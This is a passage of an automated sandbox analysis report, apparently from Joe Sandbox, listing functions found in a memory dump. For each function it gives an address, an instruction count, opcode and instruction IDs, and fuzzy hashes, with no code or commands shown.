                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction ID: c4eaefb343fd59a161c7320e97d26217e3d12ddaccaf3b8dbf1c71fe03fbf9f0
                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                    • Instruction Fuzzy Hash: CEC01232290648AFC712AA99CD01F027BA9EBA8B40F000021F6088B670C631E920EA84
                                                                                    Function 01870310 Relevance: .0, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction ID: 51052b8ecc4ff4fffe9c13649cb404278d44228b7026e2b82de3e4599930a56e
                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                    • Instruction Fuzzy Hash: 6FD01236100248EFCB01DF45C890D9AB72AFBD8710F108019FD19077108A31ED62DA50
                                                                                    Function 01850750 Relevance: .0, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction ID: aeec20868d3ab2fc73af7233e33d8c074e8bd3343f6be05662fb8a70b942d329
                                                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                    • Instruction Fuzzy Hash: 20C04C757115418FDF15DB1DD294F4577E4F754740F150890E905DB721E624E901CA11
                                                                                    Function 01924DAD Relevance: .0, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction ID: 90f9125e3950d687e611dff6db24a4eb11945b9bb46f496d11afcc626c3c6e15
                                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction Fuzzy Hash: BAB01232222545CFC7026724CB00B1873AAFF027C0F0900F06500C9C30D618CA10E502
                                                                                    Function 01894340 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8e0bc89900b791994609742c9b7131e8202245621602ab855ac771bad6db679d
                                                                                    • Instruction ID: c767c45c0f907c4ae70cc7ddf8ce8f4122dd212f8719e4cc85fecc351d2c634a
                                                                                    • Opcode Fuzzy Hash: 8e0bc89900b791994609742c9b7131e8202245621602ab855ac771bad6db679d
                                                                                    • Instruction Fuzzy Hash: 66900271B0580017A140719848945464005A7E1302B95C011E2428554CCA149B5A5372
                                                                                    Function 01894650 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 57205b2d7000ca5ece8fb5100437af5b07874602f437b2e30dea16112c318ed1
                                                                                    • Instruction ID: 732c50bc6f475ce3206be6f9a86873ba09570c0fa1635b2005a7bad6dcd4cc91
                                                                                    • Opcode Fuzzy Hash: 57205b2d7000ca5ece8fb5100437af5b07874602f437b2e30dea16112c318ed1
                                                                                    • Instruction Fuzzy Hash: C39002A1B01500475140719848144066005A7E23023D5C115A2558560CC6189A59937A
                                                                                    Function 01892B80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dcd4181719121ad2a78bc321929fc02eaf6103083df07bac4b6ac989e723549c
                                                                                    • Instruction ID: 7161fda05e396b0540a5a893ece050f9019cfae7440fbcf29daab325263b51a5
                                                                                    • Opcode Fuzzy Hash: dcd4181719121ad2a78bc321929fc02eaf6103083df07bac4b6ac989e723549c
                                                                                    • Instruction Fuzzy Hash: 6290027170140807E10471984814686000597D1302F95C011A7028655ED6659A957232
                                                                                    Function 01892BA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b80fceaaf3b3b8f9a72734b587d29dc2b283e5fcd9fb5bdbfb6e91e34f019ee8
                                                                                    • Instruction ID: 17e8c3714c39d906cfda6a3b7f46dfea6eaf6e5cfa8abf2e9f4c31b9d010a890
                                                                                    • Opcode Fuzzy Hash: b80fceaaf3b3b8f9a72734b587d29dc2b283e5fcd9fb5bdbfb6e91e34f019ee8
                                                                                    • Instruction Fuzzy Hash: D6900271B0540807E15071984424746000597D1302F95C011A2028654DC7559B5977B2
                                                                                    Function 01892BE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb4d0e1c11b351b8f8d9880bffa14940e2f17ae64c9d9d89e9f7d8a50abe0f33
                                                                                    • Instruction ID: 57e31915df96fe07f9d6b88a9338857bbca74ab396f174ba0cc51cb25c20901b
                                                                                    • Opcode Fuzzy Hash: cb4d0e1c11b351b8f8d9880bffa14940e2f17ae64c9d9d89e9f7d8a50abe0f33
                                                                                    • Instruction Fuzzy Hash: 7490027170544847E14071984414A46001597D1306F95C011A2068694DD6259F59B772
                                                                                    Function 01892BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0037bd516291ee5463af9f2482762c9122a044e1ec71267ddcc64abac3c2c5c2
                                                                                    • Instruction ID: 4e52d8b3650ee25f944b24a35bbaaf58c759517ee411dd2c6f88f4d80f6d64fa
                                                                                    • Opcode Fuzzy Hash: 0037bd516291ee5463af9f2482762c9122a044e1ec71267ddcc64abac3c2c5c2
                                                                                    • Instruction Fuzzy Hash: BB90027170140807E1807198441464A000597D2302FD5C015A2029654DCA159B5D77B2
                                                                                    Function 01892AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa69e435a127ae9c72aa521b3cd58ebbd7eb854691e7e2aa176e744430ab4d69
                                                                                    • Instruction ID: f2867e22b300211a7b04ff1bc2a298f902b34df1d4a7ee7e22364ac04a171f11
                                                                                    • Opcode Fuzzy Hash: fa69e435a127ae9c72aa521b3cd58ebbd7eb854691e7e2aa176e744430ab4d69
                                                                                    • Instruction Fuzzy Hash: 909002E1701540975500B2988414B0A450597E1302B95C016E3058560CC5259A559236
                                                                                    Function 01892AD0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68c055ef657ccf2dde23b4f9f3f27de000a51fe82fee796c937c9e312291e31a
                                                                                    • Instruction ID: d85a763ecdef048ac5eb6a0bac7f5cf5a71bf3eb9bd4b95a689a06d74a2a34d0
                                                                                    • Opcode Fuzzy Hash: 68c055ef657ccf2dde23b4f9f3f27de000a51fe82fee796c937c9e312291e31a
                                                                                    • Instruction Fuzzy Hash: 42900265711400071105B5980714507004697D6352395C021F3019550CD6219A655232
                                                                                    Function 01892AF0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6c8f9a7724d9e01d06b6c052da1d028dc9b493e142a4bfc136f54e1f0325d4cf
                                                                                    • Instruction ID: 336476aebf88d3425ed5d30791f5dd808fc0c0378e48a9085a2bee0382ac74b3
                                                                                    • Opcode Fuzzy Hash: 6c8f9a7724d9e01d06b6c052da1d028dc9b493e142a4bfc136f54e1f0325d4cf
                                                                                    • Instruction Fuzzy Hash: 0E900265721400071145B598061450B0445A7D73523D5C015F341A590CC6219A695332
                                                                                    Function 01892DB0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 96bc059b32f070adaeaa55cc6de4432bc3c569b1decdcb4962f6d41d2a2df043
                                                                                    • Instruction ID: cdd2c05fbe8468b7a50575eca3efed8778981df721a186cf36265aa7f97d8190
                                                                                    • Opcode Fuzzy Hash: 96bc059b32f070adaeaa55cc6de4432bc3c569b1decdcb4962f6d41d2a2df043
                                                                                    • Instruction Fuzzy Hash: 9790027174140407E141719844146060009A7D1342FD5C012A2428554EC6559B5AAB72
                                                                                    Function 01892DD0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1dec8b14f16fa9fac4abf19680f20b0f407cc1c702658d3a6e76a8a63aeee348
                                                                                    • Instruction ID: a41dc32aee6bfde116d938b61c15a63e227d98e406731a7a243d748caede764c
                                                                                    • Opcode Fuzzy Hash: 1dec8b14f16fa9fac4abf19680f20b0f407cc1c702658d3a6e76a8a63aeee348
                                                                                    • Instruction Fuzzy Hash: BE900261742441576545B19844145074006A7E13427D5C012A3418950CC526AA5AD732
                                                                                    Function 01892D00 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ab758a8d2974da23c9a00b99f0e70dfaae4c4553ac935ed8f9c48046bca27aff
                                                                                    • Instruction ID: 0d5f20e1252e8cdcfd618c62f630fe5ebe6ca52ffc8fd8a46a69fdd25b72698c
                                                                                    • Opcode Fuzzy Hash: ab758a8d2974da23c9a00b99f0e70dfaae4c4553ac935ed8f9c48046bca27aff
                                                                                    • Instruction Fuzzy Hash: 6990026170544447E10075985418A06000597D1306F95D011A3068595DC6359A55A232
                                                                                    Function 01892D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 620e971469dbebb3625ddf46ca7e08e74afa46ff1d81ca6c7266b21786cbf643
                                                                                    • Instruction ID: 0d3c00778b4be2c18edcd120f0f011f3ca326cd3355fea154f1a8f44f4eb236e
                                                                                    • Opcode Fuzzy Hash: 620e971469dbebb3625ddf46ca7e08e74afa46ff1d81ca6c7266b21786cbf643
                                                                                    • Instruction Fuzzy Hash: 9790026971340007E1807198541860A000597D2303FD5D415A2019558CC9159A6D5332
                                                                                    Function 01892D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8de29684b992bde55a040cc17b5775aaf5d4f404d6a5851979748952a1f7bac5
                                                                                    • Instruction ID: ce3226e3797dcc2bed03f7e501372fa069b0fbb844f96eaf0d3ad90e463be266
                                                                                    • Opcode Fuzzy Hash: 8de29684b992bde55a040cc17b5775aaf5d4f404d6a5851979748952a1f7bac5
                                                                                    • Instruction Fuzzy Hash: 5B90026170140007E140719854286064005E7E2302F95D011E2418554CD9159A5A5333
                                                                                    Function 01892CA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 596e020941d35a6ed981fae9d4d29e705c4077035cef6b39eba7d40b4b123c71
                                                                                    • Instruction ID: 0082431d147db6ef5c93e3f5dccde19d6450374bae22295405a77df89c0c9286
                                                                                    • Opcode Fuzzy Hash: 596e020941d35a6ed981fae9d4d29e705c4077035cef6b39eba7d40b4b123c71
                                                                                    • Instruction Fuzzy Hash: 2090027170140407E10075D85418646000597E1302F95D011A7028555EC6659A956232
                                                                                    Function 01892CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a09d0ba3427fd010ccdf5522a83e2a72eff59390f9410fdb87653ea39d487c22
                                                                                    • Instruction ID: b7a151ecf7343483305712a9516d1b716feccad5ac769e60cb76618b50f0b818
                                                                                    • Opcode Fuzzy Hash: a09d0ba3427fd010ccdf5522a83e2a72eff59390f9410fdb87653ea39d487c22
                                                                                    • Instruction Fuzzy Hash: 79900261B0540407E14071985428706001597D1302F95D011A2028554DC6599B5967B2
                                                                                    Function 01892CF0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7a205e7b984a6ff4807f4d9a73a64ca3e5790955358af6e4bf0dfdbf7f262165
                                                                                    • Instruction ID: 29bbb4952a3c54e065bf847dd025c7ce5ac87ea71008f2005cd94bbd58094df9
                                                                                    • Opcode Fuzzy Hash: 7a205e7b984a6ff4807f4d9a73a64ca3e5790955358af6e4bf0dfdbf7f262165
                                                                                    • Instruction Fuzzy Hash: 2390027170140407E10071985518707000597D1302F95D411A2428558DD6569A556232
                                                                                    Function 01892C60 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f13b4cfe7f62b66f9c0c3ddabce12a77d4e2f5aa6d4718be2517775b0087f37
                                                                                    • Instruction ID: 9cdfad6591b2fdd8b5641556120c5f73ca02714c7615f4a273ad9374afa31391
                                                                                    • Opcode Fuzzy Hash: 0f13b4cfe7f62b66f9c0c3ddabce12a77d4e2f5aa6d4718be2517775b0087f37
                                                                                    • Instruction Fuzzy Hash: B190027170140847E10071984414B46000597E1302F95C016A2128654DC615DA557632
                                                                                    Function 01892F90 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e77c624173101eb85ede5355379083519e4c80a162beeec26699b798eb23a5b
                                                                                    • Instruction ID: 77cae5262c4e1c6c0e387854aa2a5c610e019fe67538398eddf792633e6917b4
                                                                                    • Opcode Fuzzy Hash: 1e77c624173101eb85ede5355379083519e4c80a162beeec26699b798eb23a5b
                                                                                    • Instruction Fuzzy Hash: C890027170180407E1007198482470B000597D1303F95C011A3168555DC6259A556672
                                                                                    Function 01892FA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 030feca380a17e7d1650d3e1958c37bc534014017b8f12298baae089490f6a66
                                                                                    • Instruction ID: 14e9e2d3eed9257772b2b878c23430d27924832927d279b1aa5fdc1231a0dc97
                                                                                    • Opcode Fuzzy Hash: 030feca380a17e7d1650d3e1958c37bc534014017b8f12298baae089490f6a66
                                                                                    • Instruction Fuzzy Hash: FE90027170180407E10071984818747000597D1303F95C011A7168555EC665DA956632
                                                                                    Function 01892FB0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c66b8ea58d2f9742190949513e00d2106547cf44bdece136e84f2ed2cd1e3b86
                                                                                    • Instruction ID: 9597ed9029b7c89d2cb538b5c94fcedae049c62c1788993a494bdf480ab935a0
                                                                                    • Opcode Fuzzy Hash: c66b8ea58d2f9742190949513e00d2106547cf44bdece136e84f2ed2cd1e3b86
                                                                                    • Instruction Fuzzy Hash: 98900261B0140047514071A888549064005BBE2312795C121A299C550DC5599A695776
                                                                                    Function 01892FE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 607ad89fd7121bd477dbb2d1ae5cce003e4d35dad0a27292e1a6df942258d420
                                                                                    • Instruction ID: aab99e677c524a25474345802fee1810f900b270a4935100ddbfd6531248c920
                                                                                    • Opcode Fuzzy Hash: 607ad89fd7121bd477dbb2d1ae5cce003e4d35dad0a27292e1a6df942258d420
                                                                                    • Instruction Fuzzy Hash: 5C900261711C0047E20075A84C24B07000597D1303F95C115A2158554CC9159A655632
                                                                                    Function 01892F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbf6dbcb7202123bf87cc1f5b29f01979358f3e5ebbc7d1cb4de86f7bcb049d7
                                                                                    • Instruction ID: af3f056a197fefb8d2631b1c1a1bd95e404289d6d8fb63dcc5c910e5f8204598
                                                                                    • Opcode Fuzzy Hash: fbf6dbcb7202123bf87cc1f5b29f01979358f3e5ebbc7d1cb4de86f7bcb049d7
                                                                                    • Instruction Fuzzy Hash: 429002A174140447E10071984424B060005D7E2302F95C015E3068554DC619DE566237
                                                                                    Function 01892F60 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 232e33a31a3c25ca6270da0e8b7f1a1f18dbe790488c733dd18028a5420f38bc
                                                                                    • Instruction ID: a07e4de1411f2b7f664ff2c9feeeb3532c23dc0b59f30af3144f8fa694a163bf
                                                                                    • Opcode Fuzzy Hash: 232e33a31a3c25ca6270da0e8b7f1a1f18dbe790488c733dd18028a5420f38bc
                                                                                    • Instruction Fuzzy Hash: 199002A171140047E10471984414706004597E2302F95C012A3158554CC5299E655236
                                                                                    Function 01892E80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0975f8eead79605a50109c332213ece694a2e7fc13dc0d0ad3b6aaf0d24d1475
                                                                                    • Instruction ID: 66d691a3044b6a209202d373946b273798f0317b9255cc5bdebc6830a4e9eb11
                                                                                    • Opcode Fuzzy Hash: 0975f8eead79605a50109c332213ece694a2e7fc13dc0d0ad3b6aaf0d24d1475
                                                                                    • Instruction Fuzzy Hash: 4E900261B0140507E10171984414616000A97D1342FD5C022A3028555ECA259B96A232
                                                                                    Function 01892EA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 801bfdb475e87331ab5eb1e6f4557b15a63a1be37ee6cab34ab40b4b28d925cb
                                                                                    • Instruction ID: 4912d43ecd1c02197971f55b5bea99fcbf701f2dce84d14670c5c62bb272ceb3
                                                                                    • Opcode Fuzzy Hash: 801bfdb475e87331ab5eb1e6f4557b15a63a1be37ee6cab34ab40b4b28d925cb
                                                                                    • Instruction Fuzzy Hash: 5C9002B170140407E14071984414746000597D1302F95C011A7068554EC6599FD96776
                                                                                    Function 01892EE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ab8447460b6c11657e5d6419a13a2365fa23bbdc55eb26cfe8cf7fe243161e7
                                                                                    • Instruction ID: f9531c00b7089d5bb51fdfd12436ba0abc452280facc2d3984fccb0b7cff6284
                                                                                    • Opcode Fuzzy Hash: 3ab8447460b6c11657e5d6419a13a2365fa23bbdc55eb26cfe8cf7fe243161e7
                                                                                    • Instruction Fuzzy Hash: 6F9002A170180407E14075984814607000597D1303F95C011A3068555ECA299E556236
                                                                                    Function 01892E30 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
